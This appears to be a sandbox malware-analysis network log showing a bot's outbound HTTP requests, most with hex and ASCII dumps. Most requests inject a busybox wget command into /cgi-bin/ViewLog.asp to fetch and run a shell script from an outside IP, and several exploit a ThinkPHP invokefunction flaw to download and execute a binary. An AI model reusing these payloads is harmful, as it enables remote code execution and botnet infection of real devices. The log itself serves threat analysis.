                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        976192.168.2.235907494.120.144.858080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.903934002 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        977192.168.2.234147462.29.8.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.907516003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        978192.168.2.235943662.29.42.518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.908411026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        979192.168.2.235954431.44.135.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.915345907 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        980192.168.2.234685895.216.218.268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.565207005 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        981192.168.2.233734694.121.186.1868080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.580396891 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        982192.168.2.234207485.209.139.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.583477974 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:25.923175097 CEST1289INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:10:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        983192.168.2.233876494.122.56.858080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.586209059 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        984192.168.2.235342694.122.74.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.586787939 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        985192.168.2.235557894.121.210.678080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.586940050 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        986192.168.2.235352694.120.41.2458080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.587358952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        987192.168.2.235791285.105.225.1278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:25.587974072 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        988192.168.2.236063088.80.145.7180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.186604977 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:26.515029907 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:37:26 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        989192.168.2.235324088.254.27.15880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.198837042 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        990192.168.2.233785888.255.100.20080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.200721025 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:27.985074997 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:30.288853884 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:34.640100002 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:43.087035894 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:01.260611057 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        991192.168.2.235417094.130.59.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.536046982 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.848648071 CEST59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        992192.168.2.234372895.128.246.378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.573183060 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.917484045 CEST637INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:26 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 443
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6c 62 2e 61 76 6b 2d 63 6f 6d 2e 72 75 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at lb.avk-com.ru Port 8080</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        993192.168.2.2355206156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.623452902 CEST167INHTTP/1.0 200 OK
                                                        Server: Proxy
